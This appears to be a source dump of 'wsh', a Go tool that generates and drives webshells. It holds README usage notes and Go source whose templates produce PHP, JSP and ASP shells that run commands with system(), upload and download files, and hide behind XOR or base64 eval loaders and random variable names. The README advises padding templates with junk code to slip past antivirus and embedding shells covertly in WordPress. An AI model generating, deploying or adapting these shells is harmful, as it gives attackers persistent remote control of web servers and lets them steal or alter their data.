161 | $ jar -cvf shell.war index.jsp
162 | ```
163 |
164 | ## Templates
165 |
166 | Using the go template library adds alot of flexibility to the generator. Occasionally a webshell will get caught by AV however, I have found that adding in a bunch of random code in the template file will often make the shell look benign enough to allow it to persist on the disk. I have included an example in the templates/covert-php.tml file.
167 |
168 | Additionally, you can modify these templates to include your name/contact information for attribution in the use case of a penetration test.
169 |
170 | ## Client Functionality
171 |
172 | ### Prefix
173 |
174 | A prefix can be specified to prepend a string to each command sent to the shell. This can be used to turn a normal cmd shell into a powershell shell.
175 |
176 | ```
177 | $ wsh http://10.0.0.27/shell.asp --param cmd --prefix powershell.exe
178 | 10.0.0.27> ls
179 | Directory: C:\windows\system32\inetsrv
180 |
181 |
182 | Mode LastWriteTime Length Name
183 | ---- ------------- ------ ----
184 | d----- 5/27/2020 11:49 PM config
185 | d----- 5/27/2020 11:49 PM en
186 | d----- 5/28/2020 12:25 AM en-US
187 | -a---- 5/27/2020 11:49 PM 119808 appcmd.exe
188 | ```
189 |
190 | ### Logging
191 |
192 | Logs are timestamped and include the host being interacted with. Log files are appended, so feel free to use the same log file for multiple sessions/hosts.
193 |
194 | ```
195 | 127.0.0.1:8080/shell.php --param cmd --log localhost.log
196 | Logging to: localhost.log
197 | 127.0.0.1> ls
198 | README.md
199 | cmd
200 | example-configs
201 | ...
202 |
203 | [04/20/2020 12:02:17] 127.0.0.1> ls
204 | README.md
205 | cmd
206 | example-configs
207 | ```
208 |
209 | ### Trim prefix/suffix
210 |
211 | The client can be configured to trim extraneous html content from a request, this is useful when interacting with standard html interface webshells, or maybe if a generated shell is sneakily embedded in a wordpress installation.
212 |
213 | ```
214 | $ wsh 127.0.0.1:8080/index.php -X POST --param cmd
215 | 127.0.0.1> ls
216 | . . .
217 |
218 |
Output
219 |
220 |
221 | README.md
222 | cmd
223 | example-configs
224 | index.php
225 | main.go
226 | templates
227 |
228 |
229 | . . .
230 |
231 | $ wsh 127.0.0.1:8080/index.php -X POST --param cmd --trim-prefix '' --trim-suffix '
'
232 | 127.0.0.1> ls
233 | README.md
234 | cmd
235 | example-configs
236 | index.php
237 | main.go
238 | templates
239 | ```
240 |
--------------------------------------------------------------------------------
/cmd/generate.go:
--------------------------------------------------------------------------------
1 | package cmd
2 |
3 | import (
4 | "bytes"
5 | "crypto/md5"
6 | "encoding/base64"
7 | "encoding/hex"
8 | "errors"
9 | "fmt"
10 | "io/ioutil"
11 | "math/rand"
12 | "os"
13 | "regexp"
14 | "strings"
15 | "text/template"
16 | "time"
17 |
18 | "github.com/spf13/cobra"
19 | "github.com/spf13/viper"
20 | )
21 |
22 | var (
23 | lang string
24 | method string
25 | cmdParam string
26 | cmdHeader string
27 | whitelist []string
28 | whitelistString string
29 | password string
30 | passwordHeader string
31 | passwordParam string
32 | xorKey string
33 | xorParam string
34 | xorHeader string
35 | b64 bool
36 | noFileCapabilities bool
37 | minify bool
38 | outFile string
39 | templateFile string
40 |
41 | seededRand *rand.Rand
42 | )
43 |
44 | type shellData struct {
45 | Method string
46 | CmdParam string
47 | CmdHeader string
48 | Whitelist string
49 | Password string
50 | PasswordParam string
51 | PasswordHeader string
52 | PasswordHash string
53 | EncMethod string
54 | XorKey string
55 | XorParam string
56 | XorHeader string
57 | EncParam string
58 | EncHeader string
59 | EncKey string
60 | EncCode string
61 | FileCapabilities bool
62 | V map[string]string
63 | }
64 |
65 | // generateCmd represents the generate command
66 | var generateCmd = &cobra.Command{
67 | Use: "generate [flags]\n wsh g [flags]",
68 | Aliases: []string{"g"},
69 | Short: "Generate a webshell",
70 | Long: `Webshell generate`,
71 | Run: generate,
72 | Args: func(cmd *cobra.Command, args []string) error {
73 | if len(args) < 1 {
74 | return errors.New("language is required")
75 | }
76 | return nil
77 | },
78 | }
79 |
80 | func init() {
81 | rootCmd.AddCommand(generateCmd)
82 |
83 | seededRand = rand.New(rand.NewSource(time.Now().UnixNano()))
84 |
85 | generateCmd.Flags().StringSliceP("whitelist", "w", []string{}, "IP addresses to whitelist")
86 | viper.BindPFlag("whitelist", generateCmd.Flags().Lookup("whitelist"))
87 |
88 | generateCmd.Flags().String("pass", "", "Password protect shell")
89 | viper.BindPFlag("password", generateCmd.Flags().Lookup("pass"))
90 |
91 | generateCmd.Flags().String("pass-param", "", "Parameter for sending password")
92 | viper.BindPFlag("pass-param", generateCmd.Flags().Lookup("pass-param"))
93 |
94 | generateCmd.Flags().String("pass-header", "", "Header for sending password")
95 | viper.BindPFlag("pass-header", generateCmd.Flags().Lookup("pass-header"))
96 |
97 | generateCmd.Flags().String("xor-key", "", "Key for xor encryption")
98 | viper.BindPFlag("xor-key", generateCmd.Flags().Lookup("xor-key"))
99 |
100 | generateCmd.Flags().String("xor-param", "", "Parameter for sending xor key")
101 | viper.BindPFlag("xor-param", generateCmd.Flags().Lookup("xor-param"))
102 |
103 | generateCmd.Flags().String("xor-header", "", "Header for sending xor key")
104 | viper.BindPFlag("xor-header", generateCmd.Flags().Lookup("xor-header"))
105 |
106 | generateCmd.Flags().Bool("base64", false, "Base64 encode shell")
107 | viper.BindPFlag("base64", generateCmd.Flags().Lookup("base64"))
108 |
109 | generateCmd.Flags().Bool("no-file", false, "Disable file upload/download capabilities")
110 | viper.BindPFlag("no-file", generateCmd.Flags().Lookup("no-file"))
111 |
112 | generateCmd.Flags().Bool("minify", false, "Minify webshell code")
113 | viper.BindPFlag("minify", generateCmd.Flags().Lookup("minify"))
114 |
115 | generateCmd.Flags().StringP("template", "t", "", "Webshell template file")
116 | viper.BindPFlag("template", generateCmd.Flags().Lookup("template"))
117 |
118 | generateCmd.Flags().StringVarP(&outFile, "outfile", "o", "", "Output file")
119 | }
120 |
121 | func generate(cmd *cobra.Command, args []string) {
122 | lang = args[0]
123 |
124 | if cmdParam == "" && cmdHeader == "" {
125 | fmt.Println("--param or --header required.")
126 | os.Exit(1)
127 | }
128 |
129 | vNameMin := 3
130 | vNameMax := 7
131 | vNames := map[string]string{
132 | "cmd": genVarName(vNameMin, vNameMax), //php,jsp
133 |
134 | "whitelist": genVarName(vNameMin, vNameMax), //php,jsp
135 |
136 | "hash": genVarName(vNameMin, vNameMax), //php,jsp
137 | "pass": genVarName(vNameMin, vNameMax), //php,jsp
138 | "alg": genVarName(vNameMin, vNameMax), //jsp
139 | "hashFunc": genVarName(vNameMin, vNameMax), //jsp
140 | "digest": genVarName(vNameMin, vNameMax), //jsp
141 | "asc": genVarName(vNameMin, vNameMax), //asp
142 |
143 | "cmdArgs": genVarName(vNameMin, vNameMax), //php,jsp
144 | "filePath": genVarName(vNameMin, vNameMax), //php,jsp
145 | "file": genVarName(vNameMin, vNameMax), //jsp
146 | "fileStream": genVarName(vNameMin, vNameMax), //jsp
147 | "fileContents": genVarName(vNameMin, vNameMax), //jsp
148 | "mimeType": genVarName(vNameMin, vNameMax), //jsp
149 | "outStream": genVarName(vNameMin, vNameMax), //jsp
150 | "buffer": genVarName(vNameMin, vNameMax), //jsp
151 | "bytesRead": genVarName(vNameMin, vNameMax), //jsp
152 | "destPath": genVarName(vNameMin, vNameMax), //php
153 | "fs": genVarName(vNameMin, vNameMax), //php
154 |
155 | "encKey": genVarName(vNameMin, vNameMax), //php
156 | "encSrc": genVarName(vNameMin, vNameMax), //php
157 | "xorKey": genVarName(vNameMin, vNameMax), //php
158 | "dSrc": genVarName(vNameMin, vNameMax), //php
159 | "process": genVarName(vNameMin, vNameMax), //jsp
160 | "output": genVarName(vNameMin, vNameMax), //jsp
161 | "encObj": genVarName(vNameMin, vNameMax), //asp
162 | "b64": genVarName(vNameMin, vNameMax), //asp
163 | "binStream": genVarName(vNameMin, vNameMax), //asp
164 | "keyChar": genVarName(vNameMin, vNameMax), //asp
165 |
166 | "i": genVarName(vNameMin, vNameMax), //php
167 | "ii": genVarName(vNameMin, vNameMax), //php
168 | "msxmlVar": genVarName(vNameMin, vNameMax), //asp
169 | "base64Var": genVarName(vNameMin, vNameMax), //asp
170 |
171 | "var0": genVarName(vNameMin, vNameMax), //future shells
172 | "var1": genVarName(vNameMin, vNameMax), //future shells
173 | "var2": genVarName(vNameMin, vNameMax), //future shells
174 | "var3": genVarName(vNameMin, vNameMax), //future shells
175 | "var4": genVarName(vNameMin, vNameMax), //future shells
176 | "var5": genVarName(vNameMin, vNameMax), //future shells
177 | "var6": genVarName(vNameMin, vNameMax), //future shells
178 | "var7": genVarName(vNameMin, vNameMax), //future shells
179 | "var8": genVarName(vNameMin, vNameMax), //future shells
180 | "var9": genVarName(vNameMin, vNameMax), //future shells
181 | }
182 |
183 | d := shellData{
184 | Method: method,
185 | CmdParam: cmdParam,
186 | CmdHeader: cmdHeader,
187 | Password: password,
188 | PasswordParam: passwordParam,
189 | PasswordHeader: passwordHeader,
190 | XorKey: xorKey,
191 | XorParam: xorParam,
192 | XorHeader: xorHeader,
193 | FileCapabilities: !noFileCapabilities,
194 | V: vNames,
195 | }
196 |
197 | // Convert whitelist slice to string array format
198 | if len(whitelist) > 0 {
199 | whitelistString = "\""
200 | for i, ip := range whitelist {
201 | whitelistString += ip
202 | if i != len(whitelist)-1 {
203 | whitelistString += "\",\""
204 | } else {
205 | whitelistString += "\""
206 | }
207 | }
208 | d.Whitelist = whitelistString
209 | }
210 |
211 | // If using password, calculate md5 hash
212 | if password != "" {
213 | if passwordParam == "" && passwordHeader == "" {
214 | fmt.Println("Password parameter or header required")
215 | os.Exit(1)
216 | }
217 |
218 | hash := md5.Sum([]byte(password))
219 | d.PasswordHash = hex.EncodeToString(hash[:])
220 | }
221 |
222 | // Fix php/asp headers
223 | if lang == "php" || lang == "asp" {
224 | d.PasswordHeader = fmtHeader(passwordHeader)
225 | d.XorHeader = fmtHeader(xorHeader)
226 | d.CmdHeader = fmtHeader(cmdHeader)
227 | }
228 |
229 | // Load template
230 | tmpl := template.New("shell")
231 | var err error
232 | if templateFile != "" {
233 | tmpl, err = template.ParseFiles(templateFile)
234 | } else {
235 | if lang == "php" {
236 | tmpl, err = tmpl.Parse(phpTemplate)
237 | } else if lang == "jsp" {
238 | tmpl, err = tmpl.Parse(jspTemplate)
239 | } else {
240 | tmpl, err = tmpl.Parse(aspTemplate)
241 | }
242 | }
243 | if err != nil {
244 | fmt.Println(err)
245 | os.Exit(1)
246 | }
247 |
248 | // Parse template into code
249 | buf := new(bytes.Buffer)
250 | err = tmpl.Execute(buf, d)
251 | if err != nil {
252 | panic(err)
253 | }
254 | code := buf.String()
255 | buf.Reset()
256 |
257 | // Remove excessive new lines
258 | r := regexp.MustCompile("[\n\n]{2,}")
259 | code = r.ReplaceAllString(code, "\n")
260 |
261 | // Minify code
262 | if minify || b64 || xorKey != "" {
263 | r := regexp.MustCompile("[ \n\n]{2,}")
264 | code = r.ReplaceAllString(code, "\n")
265 | if lang == "php" {
266 | code = strings.ReplaceAll(code, "\n", "")
267 | code = strings.ReplaceAll(code, " ", "")
268 | }
269 | }
270 |
271 | // If encrypting or encoding
272 | if xorKey != "" {
273 | code = xor(code, xorKey)
274 | code = base64.StdEncoding.EncodeToString([]byte(code))
275 | d.EncCode = code
276 | err := tmpl.ExecuteTemplate(buf, "xor", d)
277 | if err != nil {
278 | panic(err)
279 | }
280 |
281 | code = buf.String()
282 | buf.Reset()
283 | }
284 |
285 | // If base64 encoding
286 | if b64 {
287 | code = base64.StdEncoding.EncodeToString([]byte(code))
288 | code = strings.ReplaceAll(code, string('\x10'), "")
289 | d.EncCode = code
290 | err := tmpl.ExecuteTemplate(buf, "b64", d)
291 | if err != nil {
292 | panic(err)
293 | }
294 |
295 | code = buf.String()
296 | buf.Reset()
297 | }
298 |
299 | // Add opening and closing brackets
300 | if lang == "php" {
301 | code = fmt.Sprintf("", code)
302 | } else if lang == "asp" {
303 | code = fmt.Sprintf("<%%%s%%>", code)
304 | }
305 |
306 | // Write to file
307 | if outFile != "" {
308 | err = ioutil.WriteFile(outFile, []byte(code), 0644)
309 | if err != nil {
310 | fmt.Printf("Error writing to file: %v\n", outFile)
311 | return
312 | }
313 | fmt.Printf("Created shell at %s.\n", outFile)
314 | } else {
315 | fmt.Println(code)
316 | }
317 | }
318 |
319 | // XOR generated code
320 | func xor(s, key string) (output string) {
321 | for i := 0; i < len(s); i++ {
322 | output += string(s[i] ^ key[i%len(key)])
323 | }
324 | return output
325 | }
326 |
327 | // Format php/asp header keys
328 | func fmtHeader(h string) string {
329 | h = strings.ReplaceAll(h, "-", "_")
330 | h = strings.ToUpper(h)
331 |
332 | return h
333 | }
334 |
335 | // Generate random variable name
336 | func genVarName(min, max int) string {
337 | charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
338 | l := seededRand.Intn(max-min) + min
339 | b := make([]byte, l)
340 |
341 | for i := range b {
342 | b[i] = charset[seededRand.Intn(len(charset))]
343 | }
344 |
345 | name := string(b)
346 | if lang == "php" {
347 | name = "$" + name
348 | }
349 |
350 | return name
351 | }
352 |
--------------------------------------------------------------------------------
/cmd/root.go:
--------------------------------------------------------------------------------
1 | package cmd
2 |
3 | import (
4 | "bufio"
5 | "crypto/tls"
6 | "encoding/base64"
7 | "errors"
8 | "fmt"
9 | "io"
10 | "io/ioutil"
11 | "net/http"
12 | "net/url"
13 | "os"
14 | "strings"
15 | "time"
16 |
17 | "github.com/chzyer/readline"
18 | "github.com/fatih/color"
19 | "github.com/spf13/cobra"
20 | "github.com/spf13/viper"
21 | )
22 |
23 | var (
24 | endpoint string
25 | httpMethod string
26 | commandParam string
27 | commandHeader string
28 | headerFlags []string
29 | paramFlags []string
30 | timeout int
31 | ignoreSSL bool
32 | logFilename string
33 | configFile string
34 |
35 | logFile *os.File
36 |
37 | prefix string
38 | trimPrefix string
39 | trimSuffix string
40 |
41 | headers map[string]string
42 | params map[string]string
43 |
44 | client http.Client
45 | )
46 |
47 | // rootCmd represents the base command when called without any subcommands
48 | var rootCmd = &cobra.Command{
49 | Use: "wsh [flags]",
50 | Short: "A brief description of your application",
51 | Long: `Generate or interact to webshells:
52 | wsh generate jsp ...
53 | `,
54 | Run: interact,
55 | Args: func(cmd *cobra.Command, args []string) error {
56 | if len(args) < 1 {
57 | return errors.New("url is required")
58 | }
59 |
60 | return nil
61 | },
62 | }
63 |
64 | // Execute adds all child commands to the root command and sets flags appropriately.
65 | // This is called by main.main(). It only needs to happen once to the rootCmd.
66 | func Execute() {
67 | if err := rootCmd.Execute(); err != nil {
68 | fmt.Println(err)
69 | os.Exit(1)
70 | }
71 | }
72 |
73 | func init() {
74 | cobra.OnInitialize(initConfig)
75 |
76 | rootCmd.PersistentFlags().StringP("method", "X", "GET", "HTTP method: GET, POST, PUT, PATCH, DELETE")
77 | viper.BindPFlag("method", rootCmd.PersistentFlags().Lookup("method"))
78 |
79 | rootCmd.PersistentFlags().String("param", "", "Parameter for sending command")
80 | viper.BindPFlag("param", rootCmd.PersistentFlags().Lookup("param"))
81 |
82 | rootCmd.PersistentFlags().String("header", "", "Header for sending command")
83 | viper.BindPFlag("header", rootCmd.PersistentFlags().Lookup("header"))
84 |
85 | rootCmd.Flags().StringSliceP("headers", "H", []string{}, "HTTP request headers")
86 | viper.BindPFlag("headers", rootCmd.Flags().Lookup("headers"))
87 |
88 | rootCmd.Flags().StringSliceP("params", "P", []string{}, "HTTP request parameters")
89 | viper.BindPFlag("parameters", rootCmd.Flags().Lookup("params"))
90 |
91 | rootCmd.Flags().Int("timeout", 10, "Request timeout in seconds")
92 | viper.BindPFlag("timeout", rootCmd.Flags().Lookup("timeout"))
93 |
94 | rootCmd.Flags().String("prefix", "", "Prepend command: 'cmd /c', 'powershell.exe', 'bash'")
95 | viper.BindPFlag("prefix", rootCmd.Flags().Lookup("prefix"))
96 |
97 | rootCmd.Flags().String("trim-prefix", "", "Trim output prefix")
98 | viper.BindPFlag("trim-prefix", rootCmd.Flags().Lookup("trim-prefix"))
99 |
100 | rootCmd.Flags().String("trim-suffix", "", "Trim output suffix")
101 | viper.BindPFlag("trim-suffix", rootCmd.Flags().Lookup("trim-suffix"))
102 |
103 | rootCmd.Flags().BoolP("ignore-ssl", "k", false, "Ignore invalid certs")
104 | viper.BindPFlag("ignore-ssl", rootCmd.Flags().Lookup("ignore-ssl"))
105 |
106 | rootCmd.Flags().StringVar(&logFilename, "log", "", "Log file")
107 | rootCmd.PersistentFlags().StringVarP(&configFile, "config", "c", "", "Config file")
108 | }
109 |
110 | func initConfig() {
111 | if configFile != "" {
112 | // Use config file from the flag.
113 | viper.SetConfigFile(configFile)
114 |
115 | // If a config file is found, read it in.
116 | if err := viper.ReadInConfig(); err == nil {
117 | fmt.Println("Using config file:", viper.ConfigFileUsed())
118 | } else {
119 | fmt.Printf("Unable to use config file: %s\n", err.Error())
120 | }
121 | }
122 |
123 | // Connect flags
124 | httpMethod = viper.GetString("method")
125 | commandParam = viper.GetString("param")
126 | commandHeader = viper.GetString("header")
127 | headerFlags = viper.GetStringSlice("headers")
128 | paramFlags = viper.GetStringSlice("parameters")
129 | timeout = viper.GetInt("timeout")
130 | prefix = viper.GetString("prefix")
131 | trimPrefix = viper.GetString("trim-prefix")
132 | trimSuffix = viper.GetString("trim-suffix")
133 | ignoreSSL = viper.GetBool("ignore-ssl")
134 |
135 | // Generate flags
136 | method = viper.GetString("method")
137 | cmdParam = viper.GetString("param")
138 | cmdHeader = viper.GetString("header")
139 | whitelist = viper.GetStringSlice("whitelist")
140 | password = viper.GetString("password")
141 | passwordParam = viper.GetString("pass-param")
142 | passwordHeader = viper.GetString("pass-header")
143 | xorKey = viper.GetString("xor-key")
144 | xorParam = viper.GetString("xor-param")
145 | xorHeader = viper.GetString("xor-header")
146 | b64 = viper.GetBool("base64")
147 | noFileCapabilities = viper.GetBool("no-file")
148 | minify = viper.GetBool("minify")
149 | templateFile = viper.GetString("template")
150 | }
151 |
152 | func interact(cmd *cobra.Command, args []string) {
153 | endpoint = args[0]
154 |
155 | if !strings.HasPrefix(strings.ToLower(endpoint), "http") {
156 | endpoint = fmt.Sprintf("http://%s", endpoint)
157 | }
158 |
159 | // Parse header flags
160 | headers = make(map[string]string)
161 | for _, h := range headerFlags {
162 | split := strings.Split(h, ":")
163 | if len(split) != 2 {
164 | fmt.Printf("Invalid header: \"%s\"\n", h)
165 | continue
166 | }
167 | headers[split[0]] = split[1]
168 | }
169 | if passwordHeader != "" {
170 | headers[passwordHeader] = password
171 | }
172 | if xorHeader != "" {
173 | headers[xorHeader] = xorKey
174 | }
175 |
176 | // Parse parameter flags
177 | params = make(map[string]string)
178 | for _, p := range paramFlags {
179 | split := strings.Split(p, ":")
180 | if len(split) != 2 {
181 | fmt.Printf("Invalid parameter: \"%s\"\n", p)
182 | continue
183 | }
184 | params[split[0]] = split[1]
185 | }
186 | if passwordParam != "" {
187 | params[passwordParam] = password
188 | }
189 | if xorParam != "" {
190 | params[xorParam] = xorKey
191 | }
192 |
193 | // Open logfile
194 | if logFilename != "" {
195 | f, err := os.OpenFile(logFilename, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
196 | if err != nil {
197 | fmt.Println(err.Error())
198 | }
199 | fmt.Println("Logging to:", logFilename)
200 | logFile = f
201 | defer logFile.Close()
202 | }
203 |
204 | // Create http client
205 | client = http.Client{
206 | Timeout: time.Duration(timeout) * time.Second,
207 | Transport: &http.Transport{
208 | TLSClientConfig: &tls.Config{
209 | InsecureSkipVerify: ignoreSSL,
210 | },
211 | },
212 | }
213 |
214 | // Get host from url
215 | host, err := getHost(endpoint)
216 | if err != nil {
217 | fmt.Println("Invalid url")
218 | return
219 | }
220 |
221 | // Build prompt
222 | clr := color.New(color.FgGreen).SprintFunc()
223 | prompt := fmt.Sprintf(clr("%s> "), host)
224 |
225 | // Create readline instance
226 | l, err := readline.NewEx(&readline.Config{
227 | Prompt: prompt,
228 | HistoryFile: ".wsh_history",
229 | InterruptPrompt: "^C",
230 | EOFPrompt: "exit",
231 |
232 | HistorySearchFold: true,
233 | })
234 | if err != nil {
235 | fmt.Println(err.Error())
236 | return
237 | }
238 | defer l.Close()
239 |
240 | // Main loop
241 | for {
242 | line, err := l.Readline()
243 | if err == readline.ErrInterrupt {
244 | if len(line) == 0 {
245 | break
246 | } else {
247 | continue
248 | }
249 | } else if err == io.EOF {
250 | break
251 | }
252 |
253 | switch {
254 | case line == "clear":
255 | readline.ClearScreen(os.Stdout)
256 | case line == "exit":
257 | os.Exit(0)
258 | case line == "quit":
259 | os.Exit(0)
260 | case line == "help":
261 | printHelp()
262 | default:
263 | // Send http request
264 | out, err := sendRequest(line)
265 | if err != nil {
266 | fmt.Printf("%s: %s", color.RedString("ERROR"), err.Error())
267 | }
268 |
269 | // Trim extraneous html
270 | if trimPrefix != "" {
271 | i := strings.Index(out, trimPrefix)
272 | if i > 0 {
273 | i += len(trimPrefix)
274 | out = out[i:]
275 | }
276 | }
277 | if trimSuffix != "" {
278 | i := strings.Index(out, trimSuffix)
279 | if i > 0 {
280 | out = out[:i]
281 | }
282 | }
283 |
284 | // Trim excess space
285 | out = strings.TrimSpace(out)
286 |
287 | // Log output
288 | if logFilename != "" {
289 | p := time.Now().Format("01/02/2006 15:04:05")
290 | p = fmt.Sprintf("[%s] %s> %s\n", p, host, line)
291 | p = fmt.Sprintf("%s%s\n\n", p, out)
292 | if _, err := logFile.WriteString(p); err != nil {
293 | fmt.Println(err)
294 | }
295 | }
296 |
297 | // Print output
298 | fmt.Println(out)
299 | }
300 | }
301 | }
302 |
303 | // Print interactive shell help
304 | func printHelp() {
305 | fmt.Println("get [local filepath] Download file")
306 | fmt.Println("put [remote filepath] Upload file")
307 | fmt.Println("clear Clear screen")
308 | fmt.Println("exit Exits shell")
309 | }
310 |
311 | // Send http request
312 | func sendRequest(cmd string) (string, error) {
313 | finalURL := endpoint
314 | var body io.Reader
315 |
316 | // Prepend prefix
317 | if prefix != "" && !strings.HasPrefix(cmd, "get") && !strings.HasPrefix(cmd, "put") {
318 | cmd = fmt.Sprintf("%s %s", strings.TrimSpace(prefix), cmd)
319 | }
320 |
321 | // If uploading file
322 | if strings.HasPrefix(cmd, "put ") {
323 | c := strings.Fields(cmd)
324 | fileName := c[1]
325 |
326 | // Open file for reading
327 | inFile, err := os.Open(fileName)
328 | if err != nil {
329 | return "", err
330 | }
331 | defer inFile.Close()
332 |
333 | reader := bufio.NewReader(inFile)
334 | content, _ := ioutil.ReadAll(reader)
335 |
336 | params["f"] = base64.StdEncoding.EncodeToString(content)
337 |
338 | // Create multipart form
339 | // b := &bytes.Buffer{}
340 | // writer := multipart.NewWriter(b)
341 |
342 | // // Add file part
343 | // part, err := writer.CreateFormFile("f", filepath.Base(fileName))
344 | // if err != nil {
345 | // return "", err
346 | // }
347 |
348 | // // Copy file to form body
349 | // _, err = io.Copy(part, inFile)
350 | // headers["Content-Type"] = writer.FormDataContentType()
351 |
352 | // body = b
353 | }
354 |
355 | if httpMethod == "GET" {
356 | data := url.Values{}
357 |
358 | if commandParam != "" {
359 | data.Set(commandParam, cmd)
360 | } else {
361 | headers[commandHeader] = cmd
362 | }
363 |
364 | for k, v := range params {
365 | data.Set(k, v)
366 | }
367 |
368 | if strings.Contains(endpoint, "?") {
369 | finalURL = fmt.Sprintf("%s&%s", endpoint, data.Encode())
370 | } else if len(data) == 0 {
371 | finalURL = endpoint
372 | } else {
373 | finalURL = fmt.Sprintf("%s?%s", endpoint, data.Encode())
374 | }
375 | } else {
376 | headers["Content-Type"] = "application/x-www-form-urlencoded"
377 | headers["Accept"] = "*/*"
378 | data := url.Values{}
379 | if commandParam != "" {
380 | data.Set(commandParam, cmd)
381 | } else {
382 | headers[commandHeader] = cmd
383 | }
384 | for k, v := range params {
385 | data.Set(k, v)
386 | }
387 | body = strings.NewReader(data.Encode())
388 | }
389 |
390 | // Build HTTP request
391 | req, err := http.NewRequest(httpMethod, finalURL, body)
392 | if err != nil {
393 | return "", err
394 | }
395 | // Parse headers
396 | for k, v := range headers {
397 | req.Header.Add(k, v)
398 | }
399 |
400 | // Send request
401 | resp, err := client.Do(req)
402 | if err != nil {
403 | return "", err
404 | }
405 | defer resp.Body.Close()
406 |
407 | // If downloading file...
408 | if strings.HasPrefix(cmd, "get ") {
409 | if resp.StatusCode == 404 {
410 | return "", errors.New("file not found")
411 | } else if resp.StatusCode != 200 {
412 | fmt.Println(resp.StatusCode)
413 | rBytes, _ := ioutil.ReadAll(resp.Body)
414 | response := string(rBytes)
415 | response = strings.Trim(response, " \n")
416 | return "", errors.New(response)
417 | }
418 |
419 | c := strings.Fields(cmd)
420 | fileName := c[1]
421 | destPath := fileName
422 | if len(c) > 2 {
423 | destPath = c[2]
424 | } else {
425 | f := strings.Split(destPath, "\\")
426 | destPath = f[len(f)-1]
427 | f = strings.Split(destPath, "/")
428 | destPath = f[len(f)-1]
429 | }
430 |
431 | outFile, err := os.Create(destPath)
432 | if err != nil {
433 | return "", err
434 | }
435 | defer outFile.Close()
436 | // b, err := ioutil.ReadAll(resp.Body)
437 | // outFile.WriteString(string(b))
438 | // return string(b), err
439 |
440 | io.Copy(outFile, resp.Body)
441 |
442 | return fmt.Sprintf("%s downloaded to %s.\n", fileName, destPath), nil
443 | }
444 |
445 | // Read server response
446 | response, err := ioutil.ReadAll(resp.Body)
447 | if err != nil {
448 | return "", err
449 | }
450 |
451 | return string(response), nil
452 | }
453 |
454 | func getHost(u string) (string, error) {
455 | t, err := url.Parse(u)
456 | if err != nil {
457 | return "", err
458 | }
459 |
460 | return t.Hostname(), nil
461 | }
462 |
--------------------------------------------------------------------------------
/cmd/generate-templates.go:
--------------------------------------------------------------------------------
1 | package cmd
2 |
3 | var phpTemplate = `
4 | {{/* Get command from param or header */}}
5 | {{ if ne .CmdHeader "" }}
6 | {{ index .V "cmd" }} = $_SERVER['HTTP_{{ .CmdHeader }}'];
7 | {{ else }}
8 |
9 | {{ if ne .Method "GET" }}
10 | parse_str(file_get_contents('php://input'), $_REQUEST);
11 | {{ end }}
12 |
13 | {{ index .V "cmd" }} = $_REQUEST['{{ .CmdParam }}'];
14 | {{ end }}
15 | {{ index .V "cmd" }} = trim({{ index .V "cmd" }});
16 |
17 |
18 | {{ if .Whitelist }}
19 | {{ index .V "whitelist" }} = array({{ .Whitelist }});
20 | if (!in_array($_SERVER['REMOTE_ADDR'], {{ index .V "whitelist" }})) {
21 | die;
22 | }
23 | {{- end }}
24 |
25 |
26 | {{ if ne .Password "" }}
27 | {{ index .V "hash" }} = '{{ .PasswordHash }}';
28 | {{ if ne .PasswordParam "" }}
29 |
30 | {{ if ne .Method "" }}
31 | {{ index .V "pass" }} = $_REQUEST['{{ .PasswordParam }}'];
32 | {{ end }}
33 |
34 | {{ else if ne .PasswordHeader "" }}
35 | {{ index .V "pass" }} = $_SERVER['HTTP_{{ .PasswordHeader }}'];
36 | {{ end }}
37 | if (md5({{ index .V "pass" }}) != {{ index .V "hash" }}) {
38 | die;
39 | }
40 | {{- end }}
41 |
42 |
43 | {{ if .FileCapabilities }}
44 | if (substr({{ index .V "cmd" }}, 0, 4) === 'get ') {
45 | {{ index .V "cmdArgs" }} = explode(' ', {{ index .V "cmd" }});
46 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
47 | if (!file_exists({{ index .V "filePath" }})) {
48 | header("HTTP/1.1 404 Not Found");
49 | die;
50 | }
51 | header("Content-Disposition: attachment; filename={{ index .V "filePath" }}");
52 | header("Content-Type: application/octet-stream");
53 | header("Content-Transfer-Encoding: binary");
54 | header('Content-Length: ' . filesize({{ index .V "filePath" }}));
55 | readfile({{ index .V "filePath" }});
56 | die;
57 | } else if (substr({{ index .V "cmd" }}, 0, 4) === 'put ') {
58 | {{ index .V "cmdArgs" }} = explode(' ', {{ index .V "cmd" }});
59 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
60 | {{ index .V "destPath" }} = basename({{ index .V "cmdArgs" }}[1]);
61 | if (count({{ index .V "cmdArgs" }}) > 2) {
62 | {{ index .V "destPath" }} = {{ index .V "cmdArgs" }}[2];
63 | }
64 | if (file_exists({{ index .V "destPath" }})) {
65 | echo {{ index .V "destPath" }}.' already exists';
66 | die;
67 | }
68 | file_put_contents({{ index .V "destPath" }}, base64_decode($_REQUEST['f']));
69 | echo 'Uploaded '.{{ index .V "filePath" }}.' to '.{{ index .V "destPath" }};
70 | die;
71 | }
72 | {{ end }}
73 |
74 | system({{ index .V "cmd" }});
75 | die;
76 |
77 |
78 |
79 | {{- define "b64" }}
80 | eval(base64_decode('{{ .EncCode }}'))
81 | {{ end }}
82 |
83 |
84 |
85 | {{ define "xor" }}
86 | {{ if ne .XorHeader "" -}}
87 | {{ index .V "xorKey" }} = $_SERVER["HTTP_{{ .XorHeader }}"];
88 | {{ else if eq .Method "GET" -}}
89 | {{ index .V "xorKey" }} = $_REQUEST["{{ .XorParam }}"];
90 | {{ else if eq .Method "POST" -}}
91 | {{ index .V "xorKey" }} = json_decode(file_get_contents('php://input'), true)['{{ .XorParam }}'];
92 | {{ end -}}
93 |
94 | {{ index .V "encSrc" }} = base64_decode("{{ .EncCode }}");
95 | {{ index .V "dSrc" }} = "";
96 | for({{ index .V "i" }}=0; {{ index .V "i" }}
107 | {{ if ne .Password "" }}
108 | <%@ page import="java.security.*" %>
109 | {{ end }}
110 | {{ if .FileCapabilities }}
111 | {{/* <%@ page import="javax.servlet.http.*" %> */}}
112 | {{/* <%@ page import="org.apache.commons.fileupload.*" %> */}}
113 | {{/* <%@ page import="org.apache.commons.fileupload.disk.*" %> */}}
114 | {{/* <%@ page import="org.apache.commons.fileupload.servlet.*" %> */}}
115 | {{/* <%@ page import="org.apache.commons.codec.binary.*" %> */}}
116 | {{/* <%@ page import="org.apache.commons.io.output.*" %> */}}
